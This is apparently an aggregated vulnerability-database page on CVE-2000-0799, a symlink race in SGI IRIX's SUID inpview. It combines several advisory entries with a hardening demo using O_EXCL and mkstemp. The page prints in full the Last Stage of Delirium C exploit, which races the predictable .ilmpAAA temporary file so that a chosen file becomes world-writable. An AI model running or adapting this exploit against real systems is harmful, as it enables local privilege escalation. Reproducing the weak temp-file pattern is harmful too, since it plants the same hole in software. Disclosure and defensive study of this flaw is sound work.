CVE-2000-0799
CVSS 3.7
Published: 2000-10-20 00:00:00
Last modified: 2008-09-05 16:21:54

[Original] inpview in InPerson in SGI IRIX 5.3 through IRIX 6.5.10 allows local users to gain privileges via a symlink attack on the .ilmpAAA temporary file.


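[CNNVD] IRIX inpview race condition vulnerability (CNNVD-200010-105)

        A vulnerability exists in inpview in InPerson in SGI IRIX 5.3 through IRIX 6.5.10. Local users can gain privileges via a symlink attack on the .ilmpAAA temporary file.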

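- CVSS (base score)

CVSS score: 3.7 [LOW]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]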

- CPE (affected platforms and products)

cpe:/o:sgi:irix:6.5.8     SGI IRIX 6.5.8
cpe:/o:sgi:irix:6.5.4     SGI IRIX 6.5.4
cpe:/o:sgi:irix:6.5.3f    SGI IRIX 6.5.3f
cpe:/o:sgi:irix:6.5.3m    SGI IRIX 6.5.3m
cpe:/o:sgi:irix:6.5.6     SGI IRIX 6.5.6
cpe:/o:sgi:irix:6.5.3     SGI IRIX 6.5.3
cpe:/o:sgi:irix:6.5.2m    SGI IRIX 6.5.2m
cpe:/o:sgi:irix:6.5.1     SGI IRIX 6.5.1
cpe:/o:sgi:irix:6.5       SGI IRIX 6.5
cpe:/o:sgi:irix:6.5.7     SGI IRIX 6.5.7

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0799
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0799
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-105
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558@ix.put.poznan.pl
(VENDOR_ADVISORY)  BUGTRAQ  20000802 [LSD] some unpublished LSD exploit codes
http://www.securityfocus.com/bid/1530
(VENDOR_ADVISORY)  BID  1530
http://xforce.iss.net/static/5065.php
(UNKNOWN)  XF  irix-inpview-symlink(5065)
ftp://patches.sgi.com/support/free/security/advisories/20001101-01-I
(UNKNOWN)  SGI  20001101-01-I

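- Vulnerability information

IRIX inpview race condition vulnerability
Low risk  Race condition
2000-10-20 00:00:00 2005-05-02 00:00:00
Local
        A vulnerability exists in inpview in InPerson in SGI IRIX 5.3 through IRIX 6.5.10. Local users can gain privileges via a symlink attack on the .ilmpAAA temporary file.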

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- Vulnerability information (20130)

IRIX 6.5.x inpview Race Condition Vulnerability (EDBID:20130)
irix local
2000-01-01 Verified
0 Last Stage of Delirium
N/A
source: http://www.securityfocus.com/bid/1530/info

Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition.

InPerson's 'inpview' is a networked multimedia conferencing tool. InPerson provides multiway audio and video conferencing with a shared whiteboard, combined into a single, easy-to-use application. You use a separate "phone" tool to place and answer calls.

The 'inpview' program writes out temporary files in the '/var/tmp' directory. Because these filenames are not random, an attacker can create a symlink to a previously created filename and force the SUID 'inpview' to overwrite the file with 'rw-rw-rw' permissions. 

                /*## copyright LAST STAGE OF DELIRIUM jan 2000 poland        *://lsd-pl.net/ #*/
                /*## /usr/lib/InPerson/inpview                                               #*/

                /*   sets rw-rw-rw permissions                                                */

                #include <sys/types.h>
                #include <dirent.h>
                #include <stdio.h>
                #include <stdlib.h>   /* exit */
                #include <string.h>   /* strncmp */
                #include <unistd.h>   /* fork, nice, sleep, close, chdir, symlink, unlink, exec* */

                int main(int argc,char **argv){
                    DIR *dirp;struct dirent *dentp;

                    printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland  //lsd-pl.net/\n");
                    printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n");

                    if(argc!=2){
                        printf("usage: %s file\n",argv[0]);
                        exit(-1);
                    }

                    /* child: after a short delay, run the SUID inpview with stdio closed */
                    if(!fork()){
                        nice(-20);sleep(2);close(0);close(1);close(2);
                        execle("/usr/lib/InPerson/inpview","lsd",0,0);
                    }

                    /* parent: poll /var/tmp until the predictable ".ilmpAAA" name appears */
                    printf("looking for temporary file... ");fflush(stdout);
                    chdir("/var/tmp");
                    dirp=opendir(".");
                    while(1){
                        if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;}
                        if(!strncmp(dentp->d_name,".ilmpAAA",8)) break; 
                    }
                    closedir(dirp);
                    printf("found!\n");
                    /* retry until a symlink to argv[1] can be created under that name */
                    while(1){
                        if(!symlink(argv[1],dentp->d_name)) break;
                    }
                    sleep(2);
                    unlink(dentp->d_name);

                    /* list argv[1] to show its resulting permissions */
                    execl("/bin/ls","ls","-l",argv[1],0);
                }

- Vulnerability information

1486
IRIX inpview .ilmpAAA Symlink Local Privilege Escalation
Local Access Required Race Condition
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- Vulnerability description

- Timeline

2000-08-02 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

IRIX inpview Race Condition Vulnerability
Race Condition Error 1530
No Yes
2000-08-02 12:00:00 2007-07-14 11:06:00
This vulnerability was posted to the Bugtraq mailing list by LSD <contact@lsd-pl.net> (Last Stage of Delirium) on August 2, 2000.

- Affected program versions

SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.4
SGI IRIX 6.5.3 m
SGI IRIX 6.5.3 f
SGI IRIX 6.5.3
SGI IRIX 6.5.2 m
SGI IRIX 6.5.1
SGI IRIX 6.5

- Vulnerability discussion

Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition.

InPerson's 'inpview' is a networked multimedia conferencing tool. InPerson provides multiway audio and video conferencing with a shared whiteboard, combined into a single, easy-to-use application. You use a separate "phone" tool to place and answer calls.

The 'inpview' program writes out temporary files in the '/var/tmp' directory. Because these filenames are not random, an attacker can create a symlink to a previously created filename and force the SUID 'inpview' to overwrite the file with 'rw-rw-rw' permissions.
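
The file-creation weakness described above, as an added example that is not part of the original entry or of SGI's code: a predictable temporary name opened without O_EXCL follows a symlink that is already in place, while an exclusive, owner-only create refuses it. How inpview actually opens its file is not shown on this page, so the weak opener is an assumed general pattern; the function names, the scratch directory and the ".ilmpAAA-demo" file name are constructed for the demonstration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* mkdtemp, symlink, O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern (assumed): predictable name, no O_EXCL, so open() follows
 * whatever already sits at `path`, a symlink included, and truncates it. */
int open_tmp_weak(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened: O_EXCL makes creation atomic and fails with EEXIST if any
 * directory entry (a symlink counts) already exists; mode is owner-only. */
int open_tmp_hardened(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private scratch directory: a symlink already
 * exists at the predictable name. Returns the protected file's size after
 * the chosen opener runs (9 = untouched, 0 = truncated), or -1 on error. */
long size_after_open(int hardened) {
    char dir[] = "/tmp/symlink-demo-XXXXXX", target[64], tmp[64];
    struct stat st;
    long size = -1;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(tmp, sizeof tmp, "%s/.ilmpAAA-demo", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0 && write(fd, "important", 9) == 9 && close(fd) == 0
        && symlink(target, tmp) == 0) {
        fd = hardened ? open_tmp_hardened(tmp) : open_tmp_weak(tmp);
        if (fd >= 0) close(fd);
        if (stat(target, &st) == 0) size = (long)st.st_size;
    }
    unlink(tmp); unlink(target); rmdir(dir);
    return size;
}

int main(void) {
    printf("weak opener:     protected file size = %ld\n", size_after_open(0));
    printf("hardened opener: protected file size = %ld\n", size_after_open(1));
    return 0;
}
```

mkstemp(3) gives the same exclusive-create behaviour and also picks an unpredictable name, which addresses the "filenames are not random" part of the issue.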

- Exploit

The following exploit is available:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- Related references
